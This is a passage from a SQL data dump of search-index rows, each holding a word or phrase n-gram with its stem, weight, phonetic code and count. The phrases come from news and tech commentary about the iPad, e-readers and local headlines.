this',0,1,1.3667,'A320',1,'en'),(16172,'average','averag',0,0,0.4667,'A162',1,'en'),(16173,'average salary','averag salary',0,1,1.4667,'A16246',1,'en'),(16174,'average salary tops','averag salary tops',0,1,1.6333,'A16246312',1,'en'),(16175,'back at','back at',0,1,1.2333,'B230',1,'en'),(16176,'back at the','back at the',0,1,1.3667,'B230',1,'en'),(16177,'background','background',0,0,0.6667,'B2653',3,'en'),(16178,'background listening','background listening',0,1,1.6667,'B265342352',1,'en'),(16179,'background listening besides','background listening besides',0,1,1.9333,'B2653423521232',1,'en'),(16180,'backlit','backlit',0,0,0.4667,'B243',1,'en'),(16181,'backlit screen','backlit screen',0,1,1.4667,'B243265',1,'en'),(16182,'backlit screen or','backlit screen or',0,1,1.5667,'B2432656',1,'en'),(16183,'bad','bad',0,0,0.2,'B300',4,'en'),(16184,'bad but','bad but',0,1,1.2333,'B313',1,'en'),(16185,'bad but all','bad but all',0,1,1.3667,'B3134',1,'en'),(16186,'ballgames','ballgam',0,0,0.6,'B4252',1,'en'),(16187,'ballgames mobile','ballgam mobile',0,1,1.5333,'B4252514',1,'en'),(16188,'ballgames mobile while','ballgam mobile while',0,1,1.7333,'B4252514',1,'en'),(16189,'ballyhoo','ballyhoo',0,0,0.5333,'B400',1,'en'),(16190,'ballyhoo but','ballyhoo but',0,1,1.4,'B413',1,'en'),(16191,'ballyhoo but don\'t','ballyhoo but don',0,1,1.6,'B41353',1,'en'),(16192,'bang','bang',0,0,0.2667,'B520',2,'en'),(16193,'bang demos','bang demos',0,1,1.3333,'B52352',1,'en'),(16194,'bang demos by','bang demos by',0,1,1.4333,'B523521',1,'en'),(16195,'baseball\'s','basebal',0,0,0.6667,'B2142',1,'en'),(16196,'baseball\'s app','basebal app',0,1,1.4667,'B21421',1,'en'),(16197,'baseball\'s app has','basebal app has',0,1,1.6,'B214212',1,'en'),(16198,'based on iphone','base on iphone',0,1,1.5,'B23515',1,'en'),(16199,'bat','bat',0,0,0.2,'B300',1,'en'),(16200,'bat you','bat you',0,1,1.2333,'B300',1,'en'),(16201,'bat you see','bat you see',0,1,1.3667,'B320',1,'en'),(16202,'bbc','bbc',0,0,0.2,'B200',1,'en'),(16203,'bbc and','bbc and',0,1,1.2333,'B253',1,'en'),(16204,'bbc and reuters','bbc and reuters',0,1,1.5,'B2536362',1,'en'),(16205,'be bad','be bad',0,1,1.2,'B300',1,'en'),(16206,'be bad but','be bad but',0,1,1.3333,'B313',1,'en'),(16207,'be chiming','be chiming',0,1,1.3333,'B252',1,'en'),(16208,'be chiming on','be chiming on',0,1,1.4333,'B2525',1,'en'),(16209,'be fast','be fast',0,1,1.2333,'B230',1,'en'),(16210,'be fast it','be fast it',0,1,1.3333,'B230',1,'en'),(16211,'be sized','be sized',0,1,1.2667,'B230',1,'en'),(16212,'be sized right','be sized right',0,1,1.4667,'B23623',1,'en'),(16213,'be summarized','be summarized',0,1,1.4333,'B25623',1,'en'),(16214,'be summarized as','be summarized as',0,1,1.5333,'B256232',1,'en'),(16215,'because','becaus',0,0,0.4667,'B200',7,'en'),(16216,'because some','becaus some',0,1,1.4,'B250',1,'en'),(16217,'because some individuals','becaus some individuals',0,1,1.8,'B2531342',1,'en'),(16218,'because those','becaus those',0,1,1.4333,'B232',1,'en'),(16219,'because those ask','becaus those ask',0,1,1.5667,'B232',1,'en'),(16220,'been','been',0,0,0.2667,'B500',12,'en'),(16221,'been afraid','been afraid',0,1,1.3667,'B5163',1,'en'),(16222,'been afraid to','been afraid to',0,1,1.4667,'B5163',1,'en'),(16223,'before the','befor the',0,1,1.3333,'B630',2,'en'),(16224,'before the launch','befor the launch',0,1,1.5667,'B63452',1,'en'),(16225,'believed','believ',0,0,0.5333,'B413',1,'en'),(16226,'believed the','believ the',0,1,1.4,'B413',1,'en'),(16227,'believed the angle','believ the angle',0,1,1.6,'B413524',1,'en'),(16228,'beloved','belov',0,0,0.4667,'B413',1,'en'),(16229,'beloved position','belov position',0,1,1.5333,'B4131235',1,'en'),(16230,'beloved position it','belov position it',0,1,1.6333,'B41312353',1,'en'),(16231,'besides ipod','besid ipod',0,1,1.4,'B23213',1,'en'),(16232,'besides ipod music','besid ipod music',0,1,1.6,'B2321352',1,'en'),(16233,'best','best',0,0,0.2667,'B230',6,'en'),(16234,'best do','best do',0,1,1.2333,'B230',1,'en'),(16235,'best do some','best do some',0,1,1.4,'B2325',1,'en'),(16236,'bestsellers','bestsel',0,0,0.7333,'B232462',1,'en'),(16237,'bestsellers the','bestsel the',0,1,1.5,'B2324623',1,'en'),(16238,'bestsellers the reading','bestsel the reading',0,1,1.7667,'B23246236352',1,'en'),(16239,'biggest','biggest',0,0,0.4667,'B230',1,'en'),(16240,'biggest change','biggest change',0,1,1.4667,'B23252',1,'en'),(16241,'biggest change it\'s','biggest change it',0,1,1.6333,'B2325232',1,'en'),(16242,'black','black',0,0,0.3333,'B420',4,'en'),(16243,'black screen','black screen',0,1,1.4,'B4265',1,'en'),(16244,'black screen if','black screen if',0,1,1.5,'B42651',1,'en'),(16245,'bracelets','bracelet',0,0,0.6,'B62432',6,'en'),(16246,'bracelets canada','bracelet canada',0,1,1.5333,'B6243253',2,'en'),(16247,'bracelets canada on','bracelet canada on',0,1,1.6333,'B62432535',1,'en'),(16248,'branded','brand',0,0,0.4667,'B653',1,'en'),(16249,'branded news','brand news',0,1,1.4,'B65352',1,'en'),(16250,'branded news sources','brand news sources',0,1,1.6667,'B6535262',1,'en'),(16251,'browser','browser',0,0,0.4667,'B626',2,'en'),(16252,'browser is','browser is',0,1,1.3333,'B6262',1,'en'),(16253,'browser is so','browser is so',0,1,1.4333,'B6262',1,'en'),(16254,'builds','build',0,0,0.4,'B432',1,'en'),(16255,'builds prospects','build prospects',0,1,1.5333,'B4321621232',1,'en'),(16256,'builds prospects publishers','build prospects publishers',0,1,1.9,'B432162123214262',1,'en'),(16257,'business pages 10','busi pages 10',0,1,1.5667,'B25212',1,'en'),(16258,'but','but',1,0,0.025,'B300',12,'en'),(16259,'but all','but all',0,1,1.2333,'B340',1,'en'),(16260,'but all this','but all this',0,1,1.4,'B3432',1,'en'),(16261,'but am','but am',0,1,1.2,'B350',1,'en'),(16262,'but am not','but am not',0,1,1.3333,'B353',1,'en'),(16263,'but an','but an',0,1,1.2,'B350',1,'en'),(16264,'but an adequate','but an adequate',0,1,1.5,'B35323',1,'en'),(16265,'but don\'t','but don',0,1,1.3,'B353',1,'en'),(16266,'but don\'t they','but don they',0,1,1.4667,'B353',1,'en'),(16267,'but it','but it',0,1,1.2,'B300',1,'en'),(16268,'but it has','but it has',0,1,1.3333,'B320',1,'en'),(16269,'but it i','but it i',0,1,1.2667,'B300',1,'en'),(16270,'but it was','but it was',0,1,1.3333,'B320',1,'en'),(16271,'but its','but its',0,1,1.2333,'B320',1,'en'),(16272,'but its layouts','but its layouts',0,1,1.5,'B32432',1,'en'),(16273,'but some','but some',0,1,1.2667,'B325',1,'en'),(16274,'but some things','but some things',0,1,1.5,'B325352',1,'en'),(16275,'but who','but who',0,1,1.2333,'B300',1,'en'),(16276,'but who types','but who types',0,1,1.4333,'B312',1,'en'),(16277,'but your','but your',0,1,1.2667,'B360',2,'en'),(16278,'but your eyes','but your eyes',0,1,1.4333,'B362',1,'en'),(16279,'buy','bui',0,0,0.2,'B000',3,'en'),(16280,'buy apps','bui apps',0,1,1.2667,'B200',1,'en'),(16281,'buy apps to','bui apps to',0,1,1.3667,'B230',1,'en'),(16282,'buy bestsellers','bui bestsellers',0,1,1.5,'B232462',1,'en'),(16283,'buy bestsellers the','bui bestsellers the',0,1,1.6333,'B2324623',1,'en'),(16284,'buyers','buyer',0,0,0.4,'B620',1,'en'),(16285,'buyers that','buyer that',0,1,1.3667,'B623',1,'en'),(16286,'buyers that they','buyer that they',0,1,1.5333,'B623',1,'en'),(16287,'by magazine','by magazine',0,1,1.3667,'B525',1,'en'),(16288,'by magazine publishers','by magazine publishers',0,1,1.7333,'B52514262',1,'en'),(16289,'by steve','by steve',0,1,1.2667,'B231',1,'en'),(16290,'by steve jobs','by steve jobs',0,1,1.4333,'B231212',1,'en'),(16291,'can also','can also',0,1,1.2667,'C542',2,'en'),(16292,'can also buy','can also buy',0,1,1.4,'C5421',1,'en'),(16293,'can be fast','can be fast',0,1,1.3667,'C5123',1,'en'),(16294,'can be summarized','can be summarized',0,1,1.5667,'C5125623',1,'en'),(16295,'can check','can check',0,1,1.3,'C520',1,'en'),(16296,'can check this','can check this',0,1,1.4667,'C5232',1,'en'),(16297,'can create','can create',0,1,1.3333,'C5263',1,'en'),(16298,'can create a','can create a',0,1,1.4,'C5263',1,'en'),(16299,'can get','can get',0,1,1.2333,'C523',1,'en'),(16300,'can get you','can get you',0,1,1.3667,'C523',1,'en'),(16301,'can move','can move',0,1,1.2667,'C510',1,'en'),(16302,'can move from','can move from',0,1,1.4333,'C5165',1,'en'),(16303,'can open','can open',0,1,1.2667,'C515',1,'en'),(16304,'can open an','can open an',0,1,1.3667,'C515',1,'en'),(16305,'can see','can see',0,1,1.2333,'C520',1,'en'),(16306,'can see is','can see is',0,1,1.3333,'C520',1,'en'),(16307,'can still','can still',0,1,1.3,'C5234',1,'en'),(16308,'can still not','can still not',0,1,1.4333,'C523453',1,'en'),(16309,'can upload','can upload',0,1,1.3333,'C5143',1,'en'),(16310,'can upload free','can upload free',0,1,1.5,'C514316',1,'en'),(16311,'canada','canada',0,0,0.4,'C530',5,'en'),(16312,'canada on','canada on',0,1,1.3,'C535',1,'en'),(16313,'canada on the','canada on the',0,1,1.4333,'C5353',1,'en'),(16314,'carsyracuse','carsyracus',0,0,0.7333,'C6262',1,'en'),(16315,'carsyracuse man','carsyracus man',0,1,1.5,'C62625',1,'en'),(16316,'carsyracuse man admits','carsyracus man admits',0,1,1.7333,'C626253532',1,'en'),(16317,'category','categori',0,0,0.5333,'C326',2,'en'),(16318,'category npr','categori npr',0,1,1.4,'C326516',1,'en'),(16319,'category npr bbc','categori npr bbc',0,1,1.5333,'C32651612',1,'en'),(16320,'change','chang',0,0,0.4,'C520',3,'en'),(16321,'change it\'s','chang it',0,1,1.3667,'C5232',1,'en'),(16322,'change it\'s more','chang it more',0,1,1.5333,'C523256',1,'en'),(16323,'changer','changer',0,0,0.4667,'C526',1,'en'),(16324,'changer of','changer of',0,1,1.3333,'C5261',1,'en'),(16325,'changer of games','changer of games',0,1,1.5333,'C5261252',1,'en'),(16326,'changes','chang',0,0,0.4667,'C520',3,'en'),(16327,'changes everything','chang everything',0,1,1.6,'C5216352',1,'en'),(16328,'changes everything ballyhoo','chang everything ballyhoo',0,1,1.9,'C521635214',1,'en'),(16329,'check this','check this',0,1,1.3333,'C320',1,'en'),(16330,'check this out','check this out',0,1,1.4667,'C323',1,'en'),(16331,'check your','check your',0,1,1.3333,'C600',1,'en'),(16332,'check your e','check your e',0,1,1.4,'C600',1,'en'),(16333,'children','children',0,0,0.5333,'C4365',2,'en'),(16334,'children who','children who',0,1,1.4,'C4365',1,'en'),(16335,'children who put','children who put',0,1,1.5333,'C436513',1,'en'),(16336,'chime','chime',0,0,0.3333,'C500',1,'en'),(16337,'chime would','chime would',0,1,1.3667,'C543',1,'en'),(16338,'chime would still','chime would still',0,1,1.5667,'C543234',1,'en'),(16339,'chiming','chime',0,0,0.4667,'C520',1,'en'),(16340,'chiming on','chime on',0,1,1.3333,'C525',1,'en'),(16341,'chiming on a','chime on a',0,1,1.4,'C525',1,'en'),(16342,'choice usa','choic usa',0,1,1.3333,'C000',1,'en'),(16343,'choice usa today','choic usa today',0,1,1.5333,'C300',1,'en'),(16344,'classics','classic',0,0,0.5333,'C420',1,'en'),(16345,'classics or','classic or',0,1,1.3667,'C426',1,'en'),(16346,'classics or buy','classic or buy',0,1,1.5,'C4261',1,'en'),(16347,'clever','clever',0,0,0.4,'C416',1,'en'),(16348,'clever solution','clever solution',0,1,1.5,'C4162435',1,'en'),(16349,'clever solution for','clever solution for',0,1,1.6333,'C416243516',1,'en'),(16350,'clippings','clip',0,0,0.6,'C4152',1,'en'),(16351,'clippings scattered','clip scattered',0,1,1.6333,'C4152363',1,'en'),(16352,'clippings scattered all','clip scattered all',0,1,1.7667,'C41523634',1,'en'),(16353,'coffee','coffe',0,0,0.4,'C100',4,'en'),(16354,'coffee table','coffe table',0,1,1.4,'C1314',1,'en'),(16355,'color','color',0,0,0.3333,'C460',2,'en'),(16356,'color but','color but',0,1,1.3,'C4613',1,'en'),(16357,'color but it','color but it',0,1,1.4,'C4613',1,'en'),(16358,'come','come',0,0,0.2667,'C500',5,'en'),(16359,'come to','come to',0,1,1.2333,'C530',2,'en'),(16360,'come to courtstate','come to courtstate',0,1,1.6,'C5326323',1,'en'),(16361,'comes','come',0,0,0.3333,'C520',5,'en'),(16362,'comes pre','come pre',0,1,1.3,'C5216',1,'en'),(16363,'comes pre installed','come pre installed',0,1,1.6333,'C521652343',1,'en'),(16364,'comics','comic',0,0,0.4,'C520',1,'en'),(16365,'comics app','comic app',0,1,1.3333,'C521',1,'en'),(16366,'comics app had','comic app had',0,1,1.4667,'C5213',1,'en'),(16367,'command','command',0,0,0.4667,'C530',1,'en'),(16368,'command lines','command lines',0,1,1.4333,'C53452',1,'en'),(16369,'command lines to','command lines to',0,1,1.5333,'C534523',1,'en'),(16370,'complaints','complaint',0,0,0.6667,'C514532',1,'en'),(16371,'complaints major','complaint major',0,1,1.5333,'C514532526',1,'en'),(16372,'complaints major league','complaint major league',0,1,1.7667,'C51453252642',1,'en'),(16373,'computer','comput',0,0,0.5333,'C5136',4,'en'),(16374,'computer os','comput os',0,1,1.3667,'C51362',1,'en'),(16375,'computer os because','comput os because',0,1,1.6333,'C5136212',1,'en'),(16376,'computer remotely','comput remotely',0,1,1.5667,'C5136534',1,'en'),(16377,'computer remotely a','comput remotely a',0,1,1.6333,'C5136534',1,'en'),(16378,'computers','comput',0,0,0.6,'C51362',1,'en'),(16379,'computers and','comput and',0,1,1.4333,'C5136253',1,'en'),(16380,'computers and from','comput and from',0,1,1.6,'C5136253165',1,'en'),(16381,'computers are','comput are',0,1,1.4333,'C513626',1,'en'),(16382,'computers are inconvenient','comput are inconvenient',0,1,1.8667,'C513626525153',1,'en'),(16383,'copy','copi',0,0,0.2667,'C100',1,'en'),(16384,'copy paste','copi paste',0,1,1.3333,'C123',1,'en'),(16385,'copy paste method','copi paste method',0,1,1.5667,'C12353',1,'en'),(16386,'core of','core of',0,1,1.2333,'C610',1,'en'),(16387,'core of features','core of features',0,1,1.5333,'C61362',1,'en'),(16388,'cost wait','cost wait',0,1,1.3,'C300',1,'en'),(16389,'cost wait for','cost wait for',0,1,1.4333,'C316',1,'en'),(16390,'coupled','coupl',0,0,0.4667,'C143',1,'en'),(16391,'coupled to','coupl to',0,1,1.3333,'C143',1,'en'),(16392,'coupled to the','coupl to the',0,1,1.4667,'C143',1,'en'),(16393,'courtstate','courtstat',0,0,0.6667,'C6323',1,'en'),(16394,'courtstate trooper','courtstat trooper',0,1,1.6,'C6323616',1,'en'),(16395,'courtstate trooper dies','courtstat trooper dies',0,1,1.7667,'C632361632',1,'en'),(16396,'covered','cover',0,0,0.4667,'C163',1,'en'),(16397,'covered in','cover in',0,1,1.3333,'C1635',1,'en'),(16398,'covered in finger','cover in finger',0,1,1.5667,'C16351526',1,'en'),(16399,'cramped','cramp',0,0,0.4667,'C6513',1,'en'),(16400,'cramped physical','cramp physical',0,1,1.5333,'C6513124',1,'en'),(16401,'cramped physical keyboard','cramp physical keyboard',0,1,1.8333,'C65131242163',1,'en'),(16402,'create','creat',0,0,0.4,'C630',1,'en'),(16403,'create a','creat a',0,1,1.2667,'C630',1,'en'),(16404,'create a generation','creat a generation',0,1,1.6333,'C6325635',1,'en'),(16405,'culture','cultur',0,0,0.4667,'C436',3,'en'),(16406,'culture shift','cultur shift',0,1,1.4333,'C436213',1,'en'),(16407,'culture shift favoring','cultur shift favoring',0,1,1.7333,'C4362131652',1,'en'),(16408,'current approach','current approach',0,1,1.5333,'C653162',1,'en'),(16409,'current approach can','current approach can',0,1,1.6667,'C6531625',1,'en'),(16410,'cursors','cursor',0,0,0.4667,'C6262',1,'en'),(16411,'cursors to','cursor to',0,1,1.3333,'C62623',1,'en'),(16412,'cursors to the','cursor to the',0,1,1.4667,'C62623',1,'en'),(16413,'david','david',0,0,0.3333,'D130',2,'en'),(16414,'david pogue','david pogue',0,1,1.3667,'D1312',1,'en'),(16415,'david pogue did','david pogue did',0,1,1.5,'D13123',1,'en'),(16416,'day','dai',0,0,0.2,'D000',8,'en'),(16417,'day after','dai after',0,1,1.3,'D136',1,'en'),(16418,'day after a','dai after a',0,1,1.3667,'D136',1,'en'),(16419,'deal','deal',0,0,0.2667,'D400',2,'en'),(16420,'deal with','deal with',0,1,1.3,'D430',2,'en'),(16421,'deal with nearly','deal with nearly',0,1,1.5333,'D43564',1,'en'),(16422,'debate','debat',0,0,0.4,'D130',1,'en'),(16423,'debate over','debat over',0,1,1.3667,'D1316',1,'en'),(16424,'debate over whether','debat over whether',0,1,1.6333,'D131636',1,'en'),(16425,'decline','declin',0,0,0.4667,'D245',1,'en'),(16426,'decline and','declin and',0,1,1.3667,'D2453',1,'en'),(16427,'decline and tap','declin and tap',0,1,1.5,'D24531',1,'en'),(16428,'delay','delai',0,0,0.3333,'D400',1,'en'),(16429,'delay fine','delai fine',0,1,1.3333,'D415',1,'en'),(16430,'delay fine here','delai fine here',0,1,1.5,'D4156',1,'en'),(16431,'demonstrated','demonstr',0,0,0.8,'D52363',1,'en'),(16432,'demonstrated milagrofilms','demonstr milagrofilms',0,1,1.8333,'D5236354261452',1,'en'),(16433,'demonstrated milagrofilms by','demonstr milagrofilms by',0,1,1.9333,'D52363542614521',1,'en'),(16434,'demos','demo',0,0,0.3333,'D520',1,'en'),(16435,'demos by','demo by',0,1,1.2667,'D521',1,'en'),(16436,'demos by magazine','demo by magazine',0,1,1.5667,'D521525',1,'en'),(16437,'desktop','desktop',0,0,0.4667,'D231',1,'en'),(16438,'desktop laptops','desktop laptops',0,1,1.5,'D23141312',1,'en'),(16439,'desktop laptops 4.the','desktop laptops 4.the',0,1,1.7,'D231413123',1,'en'),(16440,'desktop to','desktop to',0,1,1.3333,'D2313',1,'en'),(16441,'desktop to slowly','desktop to slowly',0,1,1.5667,'D231324',1,'en'),(16442,'desktops','desktop',0,0,0.5333,'D2312',1,'en'),(16443,'desktops apple','desktop apple',0,1,1.4667,'D231214',1,'en'),(16444,'desktops apple even','desktop apple even',0,1,1.6333,'D23121415',1,'en'),(16445,'destroyer','destroy',0,0,0.6,'D236',1,'en'),(16446,'destroyer of','destroy of',0,1,1.4,'D2361',1,'en'),(16447,'destroyer of worlds','destroy of worlds',0,1,1.6333,'D23616432',1,'en'),(16448,'devices but','devic but',0,1,1.3667,'D1213',1,'en'),(16449,'devices but some','devic but some',0,1,1.5333,'D121325',1,'en'),(16450,'did','did',0,0,0.2,'D000',5,'en'),(16451,'did not','did not',0,1,1.2333,'D530',3,'en'),(16452,'did not even','did not even',0,1,1.4,'D5315',1,'en'),(16453,'did the','did the',0,1,1.2333,'D000',1,'en'),(16454,'did the particular','did the particular',0,1,1.6,'D163246',1,'en'),(16455,'didn\'t','didn',0,0,0.4,'D530',2,'en'),(16456,'didn\'t zoom','didn zoom',0,1,1.3667,'D5325',1,'en'),(16457,'didn\'t zoom naturally','didn zoom naturally',0,1,1.7,'D5325364',1,'en'),(16458,'dies','di',0,0,0.2667,'D200',1,'en'),(16459,'dies from','di from',0,1,1.3,'D2165',1,'en'),(16460,'dies from injuries','di from injuries',0,1,1.6,'D2165262',1,'en'),(16461,'disk','disk',0,0,0.2667,'D200',1,'en'),(16462,'disk 2.apple\'s','disk 2.apple',0,1,1.4667,'D2142',1,'en'),(16463,'disk 2.apple\'s current','disk 2.apple current',0,1,1.7333,'D2142653',1,'en'),(16464,'display','displai',0,0,0.4667,'D214',2,'en'),(16465,'display with','displai with',0,1,1.4,'D2143',1,'en'),(16466,'display with pages','displai with pages',0,1,1.6,'D214312',1,'en'),(16467,'do','do',0,0,0.1333,'D000',11,'en'),(16468,'do a','do a',0,1,1.1333,'D000',2,'en'),(16469,'do a lot','do a lot',0,1,1.2667,'D430',1,'en'),(16470,'do on','do on',0,1,1.1667,'D500',1,'en'),(16471,'do on an','do on an',0,1,1.2667,'D500',1,'en'),(16472,'do some','do some',0,1,1.2333,'D250',1,'en'),(16473,'do some stuff','do some stuff',0,1,1.4333,'D25231',1,'en'),(16474,'do wonder','do wonder',0,1,1.3,'D536',1,'en'),(16475,'do wonder if','do wonder if',0,1,1.4,'D5361',1,'en'),(16476,'documents','document',0,0,0.6,'D2532',1,'en'),(16477,'documents assess','document assess',0,1,1.5333,'D2532',1,'en'),(16478,'documents assess full','document assess full',0,1,1.7,'D253214',1,'en'),(16479,'doesn\'t','doesn',0,0,0.4667,'D253',2,'en'),(16480,'doesn\'t i','doesn i',0,1,1.3,'D253',1,'en'),(16481,'doesn\'t i believed','doesn i believed',0,1,1.6,'D2531413',1,'en'),(16482,'don\'t','don',0,0,0.3333,'D530',3,'en'),(16483,'don\'t fully','don fully',0,1,1.3667,'D5314',1,'en'),(16484,'don\'t fully trust','don fully trust',0,1,1.5667,'D53143623',1,'en'),(16485,'don\'t notice','don notice',0,1,1.4,'D53532',1,'en'),(16486,'don\'t notice the','don notice the',0,1,1.5333,'D535323',1,'en'),(16487,'don\'t possess','don possess',0,1,1.4333,'D5312',1,'en'),(16488,'don\'t possess abnormally','don possess abnormally',0,1,1.8,'D531215654',1,'en'),(16489,'don\'t they','don they',0,1,1.3333,'D530',1,'en'),(16490,'don\'t they sound','don they sound',0,1,1.5333,'D53253',1,'en'),(16491,'don\'t want','don want',0,1,1.3333,'D5353',1,'en'),(16492,'don\'t want to','don want to',0,1,1.4333,'D5353',1,'en'),(16493,'down','down',0,0,0.2667,'D500',5,'en'),(16494,'down and','down and',0,1,1.2667,'D530',1,'en'),(16495,'down and sweep','down and sweep',0,1,1.4667,'D5321',1,'en'),(16496,'down is','down is',0,1,1.2333,'D520',1,'en'),(16497,'down is maximum','down is maximum',0,1,1.5,'D52525',1,'en'),(16498,'down refuses','down refuses',0,1,1.4,'D5612',1,'en'),(16499,'down refuses to','down refuses to',0,1,1.5,'D56123',1,'en'),(16500,'download','download',0,0,0.5333,'D543',2,'en'),(16501,'download and','download and',0,1,1.4,'D54353',1,'en'),(16502,'download and now','download and now',0,1,1.5333,'D543535',1,'en'),(16503,'e mail','e mail',0,1,1.2,'E540',2,'en'),(16504,'e mail just','e mail just',0,1,1.3667,'E5423',1,'en'),(16505,'e mail program','e mail program',0,1,1.4667,'E5416265',1,'en'),(16506,'e mail while','e mail while',0,1,1.4,'E540',1,'en'),(16507,'e reader','e reader',0,1,1.2667,'E636',1,'en'),(16508,'e reader potential','e reader potential',0,1,1.6,'E63613534',1,'en'),(16509,'earlier','earlier',0,0,0.4667,'E646',1,'en'),(16510,'earlier leader','earlier leader',0,1,1.4667,'E646436',1,'en'),(16511,'earlier leader in','earlier leader in',0,1,1.5667,'E6464365',1,'en'),(16512,'easier','easier',0,0,0.4,'E260',1,'en'),(16513,'easier than','easier than',0,1,1.3667,'E2635',1,'en'),(16514,'easier than cramped','easier than cramped',0,1,1.6333,'E263526513',1,'en'),(16515,'editors\'','editor',0,0,0.5333,'E362',1,'en'),(16516,'editors\' choice','editor choice',0,1,1.5,'E362',1,'en'),(16517,'editors\' choice usa','editor choice usa',0,1,1.6333,'E362',1,'en'),(16518,'efficient list','effici list',0,1,1.4667,'E1253423',1,'en'),(16519,'efficient list with','effici list with',0,1,1.6333,'E1253423',1,'en'),(16520,'employ','emploi',0,0,0.4,'E514',2,'en'),(16521,'employ word','emploi word',0,1,1.3667,'E51463',1,'en'),(16522,'employ word or','emploi word or',0,1,1.4667,'E514636',1,'en'),(16523,'enough','enough',0,0,0.4,'E520',3,'en'),(16524,'enough to','enough to',0,1,1.3,'E523',1,'en'),(16525,'enough to pay','enough to pay',0,1,1.4333,'E5231',1,'en'),(16526,'even','even',0,0,0.2667,'E150',5,'en'),(16527,'even only','even only',0,1,1.3,'E154',1,'en'),(16528,'even only over','even only over',0,1,1.4667,'E15416',1,'en'),(16529,'even seem','even seem',0,1,1.3,'E1525',1,'en'),(16530,'even seem to','even seem to',0,1,1.4,'E15253',1,'en'),(16531,'even still','even still',0,1,1.3333,'E15234',1,'en'),(16532,'even still makes','even still makes',0,1,1.5333,'E1523452',1,'en'),(16533,'even when','even when',0,1,1.3,'E150',1,'en'),(16534,'even when you','even when you',0,1,1.4333,'E150',1,'en'),(16535,'everything','everyth',0,0,0.6667,'E16352',2,'en'),(16536,'everything ballyhoo','everyth ballyhoo',0,1,1.6333,'E1635214',1,'en'),(16537,'everything ballyhoo but','everyth ballyhoo but',0,1,1.7667,'E163521413',1,'en'),(16538,'exactly','exactli',0,0,0.4667,'E234',2,'en'),(16539,'exactly what','exactli what',0,1,1.4,'E2343',1,'en'),(16540,'exactly what happened','exactli what happened',0,1,1.7,'E2343153',1,'en'),(16541,'expected','expect',0,0,0.5333,'E2123',2,'en'),(16542,'expected even','expect even',0,1,1.4333,'E212315',1,'en'),(16543,'expected even only','expect even only',0,1,1.6,'E2123154',1,'en'),(16544,'expecting','expect',0,0,0.6,'E212352',1,'en'),(16545,'expecting it','expect it',0,1,1.4,'E2123523',1,'en'),(16546,'expecting it to','expect it to',0,1,1.5,'E2123523',1,'en'),(16547,'exquisitely','exquisit',0,0,0.7333,'E234',1,'en'),(16548,'exquisitely and','exquisit and',0,1,1.5,'E23453',1,'en'),(16549,'exquisitely and seamlessly','exquisit and seamlessly',0,1,1.8667,'E2345325424',1,'en'),(16550,'eyes','ey',0,0,0.2667,'E200',1,'en'),(16551,'eyes may','ey may',0,1,1.2667,'E250',1,'en'),(16552,'eyes may need','ey may need',0,1,1.4333,'E253',1,'en'),(16553,'face','face',0,0,0.2667,'F200',1,'en'),(16554,'face you','face you',0,1,1.2667,'F200',1,'en'),(16555,'face you are','face you are',0,1,1.4,'F260',1,'en'),(16556,'family','famili',0,0,0.4,'F540',4,'en'),(16557,'family symbol','famili symbol',0,1,1.4333,'F542514',1,'en'),(16558,'family symbol mode','famili symbol mode',0,1,1.6,'F54251453',1,'en'),(16559,'fast inside','fast inside',0,1,1.3667,'F23523',1,'en'),(16560,'fast inside of','fast inside of',0,1,1.4667,'F235231',1,'en'),(16561,'fast it','fast it',0,1,1.2333,'F230',1,'en'),(16562,'fast it really','fast it really',0,1,1.4667,'F2364',1,'en'),(16563,'fast via','fast via',0,1,1.2667,'F231',1,'en'),(16564,'fast via internet','fast via internet',0,1,1.5667,'F23153653',1,'en'),(16565,'favoring','favor',0,0,0.5333,'F652',1,'en'),(16566,'favoring the','favor the',0,1,1.4,'F6523',1,'en'),(16567,'favoring the use','favor the use',0,1,1.5333,'F65232',1,'en'),(16568,'features','featur',0,0,0.5333,'F362',1,'en'),(16569,'features handled','featur handled',0,1,1.5333,'F3625343',1,'en'),(16570,'features handled exquisitely','featur handled exquisitely',0,1,1.9333,'F3625343234',1,'en'),(16571,'feel','feel',0,0,0.2667,'F400',5,'en'),(16572,'feel of','feel of',0,1,1.2333,'F410',1,'en'),(16573,'feel of i','feel of i',0,1,1.3,'F410',1,'en'),(16574,'feet','feet',0,0,0.2667,'F300',1,'en'),(16575,'feet on','feet on',0,1,1.2333,'F350',1,'en'),(16576,'feet on the','feet on the',0,1,1.3667,'F353',1,'en'),(16577,'few','few',0,0,0.2,'F000',3,'en'),(16578,'few lying','few lying',0,1,1.3,'F452',1,'en'),(16579,'few lying flat','few lying flat',0,1,1.4667,'F452143',1,'en'),(16580,'figured','figur',0,0,0.4667,'F263',2,'en'),(16581,'figured out','figur out',0,1,1.3667,'F263',1,'en'),(16582,'figured out a','figur out a',0,1,1.4333,'F263',1,'en'),(16583,'find','find',0,0,0.2667,'F530',3,'en'),(16584,'find out','find out',0,1,1.2667,'F530',2,'en'),(16585,'find out why','find out why',0,1,1.4,'F530',1,'en'),(16586,'find that','find that',0,1,1.3,'F530',1,'en'),(16587,'find that the','find that the',0,1,1.4333,'F530',1,'en'),(16588,'find your','find your',0,1,1.3,'F536',1,'en'),(16589,'find your own','find your own',0,1,1.4333,'F5365',1,'en'),(16590,'findssyracuse','findssyracus',0,0,0.8667,'F53262',1,'en'),(16591,'findssyracuse man','findssyracus man',0,1,1.5667,'F532625',1,'en'),(16592,'findssyracuse man accused','findssyracus man accused',0,1,1.8333,'F53262523',1,'en'),(16593,'fine','fine',0,0,0.2667,'F500',1,'en'),(16594,'fine here','fine here',0,1,1.3,'F560',1,'en'),(16595,'fine here but','fine here but',0,1,1.4333,'F5613',1,'en'),(16596,'finger','finger',0,0,0.4,'F526',1,'en'),(16597,'finger prints','finger prints',0,1,1.4333,'F52616532',1,'en'),(16598,'finger prints stare','finger prints stare',0,1,1.6333,'F5261653236',1,'en'),(16599,'fingers','finger',0,0,0.4667,'F5262',1,'en'),(16600,'fingers 3.apple','finger 3.apple',0,1,1.5,'F526214',1,'en'),(16601,'fingers 3.apple still','finger 3.apple still',0,1,1.7,'F526214234',1,'en'),(16602,'fingers can','finger can',0,1,1.3667,'F52625',1,'en'),(16603,'fingers can get','finger can get',0,1,1.5,'F5262523',1,'en'),(16604,'flat','flat',0,0,0.2667,'F430',1,'en'),(16605,'flat on','flat on',0,1,1.2333,'F435',1,'en'),(16606,'flat on a','flat on a',0,1,1.3,'F435',1,'en'),(16607,'floppy','floppi',0,0,0.4,'F410',1,'en'),(16608,'floppy disk','floppi disk',0,1,1.3667,'F4132',1,'en'),(16609,'floppy disk 2.apple\'s','floppi disk 